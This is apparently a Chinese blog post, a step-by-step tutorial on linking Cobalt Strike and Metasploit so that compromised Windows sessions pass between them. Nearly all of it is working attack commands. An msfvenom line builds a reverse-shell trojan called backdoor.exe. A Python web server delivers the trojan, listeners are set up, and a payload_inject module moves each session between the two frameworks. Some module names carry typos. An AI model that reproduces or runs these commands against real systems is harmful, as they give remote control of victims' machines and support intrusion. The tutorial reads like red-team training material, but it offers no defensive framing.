Cobalt Strike 與 MSF 聯動

kalixcn發表於2024-04-13

使用Cobalt Strike生成的會話和MSF相互連線,在內網滲透中,可以方便後期的滲透。

一、Cobalt Strike連線MSF會話

1. 上線msf會話

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4422 -f exe > backdoor.exe

img

2. python開啟web服務,下載木馬

python3 -m http.server 80

img

3. msf進行監聽模式

msfconsole
use exploit/multi/hander
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.128
set lport 4444
run

執行木馬反彈shell
img

4. 開啟Cobalt Strike

./teamserver 10.10.10.128 123456

客戶端連線後,新增一個監聽
img

5. 會話轉移到CS上

backgroud
use exploit/window/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 10.10.10.128
set lport 8888
set DisablePayloadHandler True
set PrependMigrate True
sessions -l
set session 1
run

img
img

二、MSF連線Cobalt Strike會話

1. 新增一個監聽,生成一個木馬程式
img

img

2. 重新新增一個監聽器
img

3. 會話轉義到MSF

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lport 9999
set lhost 0.0.0.0
exploit

img
img

相關文章